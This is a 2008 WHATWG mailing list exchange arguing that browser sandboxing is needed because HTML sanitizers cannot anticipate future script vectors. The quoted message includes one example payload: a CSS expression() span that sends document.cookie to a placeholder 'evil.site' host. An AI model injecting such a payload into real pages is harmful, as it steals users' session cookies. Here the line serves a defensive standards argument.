[whatwg] Sandboxing to accommodate user generated content.

Kristof Zelechovski giecrilj at stegny.2a.pl
Tue Jun 17 14:36:23 PDT 2008


This particular explanation is irrelevant to the topic because sandboxed
fragments can contain scripts, whether within CSS or not.  The idea of
sandboxing is to disable scripts, not to purge them.
Chris

-----Original Message-----
From: whatwg-bounces at lists.whatwg.org
[mailto:whatwg-bounces at lists.whatwg.org] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 8:34 PM
To: Kristof Zelechovski
Cc: whatwg at lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

> 1.  Please elaborate how an extension of CSS would require a sanitizer
> update.

In the year 1998: A sanitizer algorithm works perfectly for all
existing methods of adding scripts. It uses a white list, which allows
only certain tags and attributes. Among the allowed attributes is
colspan, rowspan and style - since the web developer wants users to be
able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is introduced, and it
introduces a new invention; CSS-expressions. Suddenly the formerly
secure webapplication is no longer secure. A user adds the following
code, and it passes the sanitizer easily:

<span style='color: blue; width: expression(document.write("<img
src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other, brilliant inventions
in the future which will break sanitizers - ofcourse we can't know
which inventions today - but the sandboxing means that browser vendors
in the future can prevent the above scenario.






More information about the whatwg mailing list